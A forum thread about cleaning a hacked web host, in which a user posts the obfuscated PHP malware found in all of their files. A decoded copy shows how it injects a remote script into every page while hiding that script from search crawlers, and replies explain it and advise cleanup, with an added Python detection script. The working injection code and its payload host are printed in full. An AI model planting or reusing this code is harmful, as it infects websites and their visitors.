Not sure what this code is, but it was in all my PHP files in my GoDaddy hosting account. When I went to my site through Google it took me to a "your site's infected" page. I managed to restore and fix all the files, but not sure if it will come back. What can I do to prevent this?

<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5alpXTm9hWEpsWTI5dExtTnZiUzlxY3k1d2FIQWlQand2YzJOeWFYQjBQZz09Iik7ICAgICAgfSAgICAgIHJldHVybiAiIjsgICAgIH0gICAgfSAgICAgICAgaWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ICAgICBmdW5jdGlvbiBnemRlY29kZSgkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDKXsgICAgICAkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEPUBvcmQoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLDMsMSkpOyAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9MTA7ICAgICAgJFJBM0Q1MkU1MkE0ODkzNkNERTBGNTM1NkJCMDg2NTJGMj0wOyAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmNCl7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndicsc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyAgICAgICAkUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCPSRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUJbMV07ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTIrJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQjsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY4KXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7ICAgICAgfSAgICAgIGlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYyKXsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MjsgICAgICB9ICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz1AZ3ppbmZsYXRlKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSk7ICAgICAgaWYoJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz09PUZBTFNFKXsgICAgICAgJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDOyAgICAgIH0gICAgICByZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1MzsgICAgIH0gICAgfSAgICBmdW5jdGlvbiBtcm9iaCgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKXsgICAgIEhlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScpOyAgICAgJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERT1nemRlY29kZSgkUkU4MkVFOUIxMjFGNzA5ODk1RUY1NEVCQTdGQTZCNzhCKTsgICAgICAgaWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7ICAgICAgcmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpOyAgICAgfWVsc2V7ICAgICAgcmV0dXJuICRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUuZ21sKCk7ICAgICB9ICAgIH0gICAgb2Jfc3RhcnQoJ21yb2JoJyk7ICAgfSAgfQ=="));?> <?php
Decodes to:

<?php
if (function_exists('ob_start') && !isset($GLOBALS['mr_no'])) {
    $GLOBALS['mr_no'] = 1;
    if (!function_exists('mrobh')) {
        if (!function_exists('gml')) {
            // Returns the injected script tag, except for Googlebot and Yahoo user agents.
            function gml() {
                if (!stristr($_SERVER["HTTP_USER_AGENT"], "googlebot") && (!stristr($_SERVER["HTTP_USER_AGENT"], "yahoo"))) {
                    return "<script src=\"http://cechirecom.com/js.php\"></script>";
                }
                return "";
            }
        }
        if (!function_exists('gzdecode')) {
            // Fallback gzdecode: skips the gzip header, then inflates the body.
            function gzdecode($R5A9CF1B497502ACA23C8F611A564684C) {
                $R30B2AB8DC1496D06B230A71D8962AF5D = @ord(@substr($R5A9CF1B497502ACA23C8F611A564684C, 3, 1));
                $RBE4C4D037E939226F65812885A53DAD9 = 10;
                $RA3D52E52A48936CDE0F5356BB08652F2 = 0;
                if ($R30B2AB8DC1496D06B230A71D8962AF5D & 4) {
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB = @unpack('v', substr($R5A9CF1B497502ACA23C8F611A564684C, 10, 2));
                    $R63BEDE6B19266D4EFEAD07A4D91E29EB = $R63BEDE6B19266D4EFEAD07A4D91E29EB[1];
                    $RBE4C4D037E939226F65812885A53DAD9 += 2 + $R63BEDE6B19266D4EFEAD07A4D91E29EB;
                }
                if ($R30B2AB8DC1496D06B230A71D8962AF5D & 8) {
                    $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                }
                if ($R30B2AB8DC1496D06B230A71D8962AF5D & 16) {
                    $RBE4C4D037E939226F65812885A53DAD9 = @strpos($R5A9CF1B497502ACA23C8F611A564684C, chr(0), $RBE4C4D037E939226F65812885A53DAD9) + 1;
                }
                if ($R30B2AB8DC1496D06B230A71D8962AF5D & 2) {
                    $RBE4C4D037E939226F65812885A53DAD9 += 2;
                }
                $R034AE2AB94F99CC81B389A1822DA3353 = @gzinflate(@substr($R5A9CF1B497502ACA23C8F611A564684C, $RBE4C4D037E939226F65812885A53DAD9));
                if ($R034AE2AB94F99CC81B389A1822DA3353 === false) {
                    $R034AE2AB94F99CC81B389A1822DA3353 = $R5A9CF1B497502ACA23C8F611A564684C;
                }
                return $R034AE2AB94F99CC81B389A1822DA3353;
            }
        }
        // Output buffer callback: inserts gml() before </body>, or appends it if there is no </body>.
        function mrobh($RE82EE9B121F709895EF54EBA7FA6B78B) {
            header('Content-Encoding: none');
            $RA179ABD3A7B9E28C369F7B59C51B81DE = gzdecode($RE82EE9B121F709895EF54EBA7FA6B78B);
            if (preg_match('/\<\/body/si', $RA179ABD3A7B9E28C369F7B59C51B81DE)) {
                return preg_replace('/(\<\/body[^\>]*\>)/si', gml() . "\n" . '$1', $RA179ABD3A7B9E28C369F7B59C51B81DE);
            } else {
                return $RA179ABD3A7B9E28C369F7B59C51B81DE . gml();
            }
        }
        ob_start('mrobh');
    }
}
?>
Looks like it creates a malicious output buffer handler; then, when your scripts finish executing, it adds its little redirect code in there before flushing it to the browser (but it makes sure not to output the malicious redirect if it detects that Googlebot or Yahoo are spidering your site).
Thanks for the info. I hope restoring everything fixed this so they can't do it again. If not I may have to wipe my server and upload everything again.
Change all your passwords and update all your scripts to be sure there are no security holes. Worst case, switch hosting companies and reinstall your scripts fresh from the publisher.
Wow, this happened to me today too, sucked ass... but I found a good tutorial to fix it: www?wpsecuritylock?com/cechriecom-com-script-wordpress-hacked-on-godaddy-case-study/ If I didn't know how to code myself, though, I might not have found any good search terms to find a solution. I decoded the code, and checked the source files, and whatnot, and researched the Firebug. I might not even have noticed if their script didn't totally mess up my WordPress dashboard. NOTE to moderators (also I couldn't post the link because of my post count; hope that's not against terms or anything, but it's a really helpful link, and it is NOT a link that I'm in any way affiliated with.)
Good luck! Msg me if you need any help. I will provide support for you for free. I HATE this kind of thing. Just remove ALL that code from your scripts.
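A way to find and strip the injected `eval(base64_decode(...))` prefix discussed in this thread, as an added example that is not part of any post. It decodes the payload statically and never executes it; the function names and the placeholder URL in the constructed sample are assumptions.

```python
import base64
import re

# Injected prefix in the form shown in this thread:
#   <?php /**/ eval(base64_decode("...")); ?>
INJECTED = re.compile(
    rb'<\?php\s*(?:/\*.*?\*/\s*)?eval\(\s*base64_decode\(\s*'
    rb'(["\'])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*;\s*\?>\s*', re.S)
# base64_decode("...") literals nested inside an already decoded layer.
NESTED = re.compile(rb'base64_decode\(\s*(["\'])([A-Za-z0-9+/=]+)\1\s*\)')
SCRIPT_SRC = re.compile(rb'<script[^>]+src=["\']?([^"\'\s>]+)', re.I)

def decode_layers(b64, depth=3):
    """Decode a payload and its nested base64 literals; nothing is executed."""
    try:
        text = base64.b64decode(b64)
    except ValueError:  # bad padding or otherwise not valid base64
        return []
    layers = [text]
    if depth > 0:
        for m in NESTED.finditer(text):
            layers += decode_layers(m.group(2), depth - 1)
    return layers

def analyse(source):
    """Return (cleaned_bytes, findings) for the bytes of one PHP file."""
    findings = []
    for m in INJECTED.finditer(source):
        joined = b"\n".join(decode_layers(m.group(2)))
        findings.append({
            "offset": m.start(),
            "output_buffer_hook": b"ob_start(" in joined,
            "user_agent_check": b"HTTP_USER_AGENT" in joined,
            "script_urls": [u.decode("latin-1") for u in SCRIPT_SRC.findall(joined)],
        })
    return INJECTED.sub(b"", source), findings

def constructed_sample():
    """Constructed input with the same structure; the URL is a placeholder."""
    tag = base64.b64encode(b'<script src="http://malicious.example/js.php"></script>')
    inner = (b"if(!isset($GLOBALS['x'])){function g(){if(!stristr("
             b"$_SERVER['HTTP_USER_AGENT'],'googlebot')){return base64_decode(\""
             + tag + b"\");}return '';}ob_start('h');}")
    return (b'<?php /**/ eval(base64_decode("' + base64.b64encode(inner)
            + b'"));?><?php\necho "hello";\n?>')
```

Pass each file's bytes to `analyse` and review the findings before writing the cleaned bytes back.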